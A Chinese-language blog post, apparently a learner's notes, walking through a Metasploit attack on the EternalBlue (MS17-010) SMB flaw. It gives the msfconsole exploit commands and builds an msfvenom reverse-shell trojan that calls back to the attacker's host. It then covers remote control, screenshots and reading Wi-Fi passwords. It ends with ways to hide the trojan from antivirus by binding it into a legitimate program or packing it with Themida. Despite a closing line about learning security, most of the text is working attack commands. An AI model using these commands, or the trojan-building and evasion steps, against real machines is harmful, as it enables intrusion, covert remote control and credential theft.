永恒之蓝漏洞的小知识: 黑客通过改造 永恒之蓝 制作 wannacry 制作病毒入侵高校内网。
mestaploit 攻击永恒之蓝流程:
- 使用模块 msfconsole
- 配置required 模块参数
- 运行,开始监听主机
msfconsole
主要模块 - 选择使用模块
search ms17_010 use exploit/windows/smb/ms17_010_eternalblue # 同 use 0
主要options参数说明(仅主要查看 required 参数)
set payload windows/x64/meterpreter/reverse_tcp
选择载荷payload (若使用liunx 替换 window 字段即可)
选择攻击IP对象,需同一网段的可访问主机
set RHOSTS 192.168.0.x # 若扫描整个网段 192.168.0.0-254set lport 999 # 端口配置,可随机配置无占用端口run # 运行测试
目前测试的是一台 window11 系统,攻击失败了(当前漏洞早修复了哈哈)
使用kali 渗透工具生成木马文件 用于远程控制
主要工具 msfvenom 说明:用来生成后门的软件,监听对方主机上线并控制
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.x.x lport=999 -f exe -o demo.exe
options:
-p payload 载体
window/x64/meterpreter_reverse_tcp 系统作用name
lhost kali 的ip
lport 自定义端口
-f format 格式 (自定义)
-o 输出文件
生成木马文件demo.exe成功
接下来启动 msfconsole 工具 并开始监听目标主机上线
检查payload载体 --- 配置所需载体
msfconsole # 启动工具show options # 检查参数set payload windows/x64/meterpreter_reverse_tcp # 配置payload
启动监听,等待目标主机上线
在目标主机双击木马文件(测试前需要关闭杀毒软件,不然被删除拦截哈哈)
这时候就可以远程控制目标主机 嘿嘿嘿~
查看目标主机信息
截图,控制主机,查看wifi密码
截图展示:(PS: 正在疯狂学习ing 哈哈)
更多选项参数请浏览博客:
Metasploit后渗透命令大全讲解——超详细_stdapi_sys_power_exitwindows: operation failed: 13-CSDN博客
进阶知识:如何躲避杀毒软件,实现免杀
方法1: 可将木马文件捆绑到xxx软件来躲避杀毒软件
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.79.128 lport=999 -f exe -x xxx.exe -o xxx.exe
方法2:加壳、加密 --- 将木马文件放到加密软件 实现加壳来躲避 杀毒软件
工具: Themida 工具
下载地址:Themida - Download
PS: 学习网安知识,提高自身安全知识,多认证官方渠道,避免病毒攻击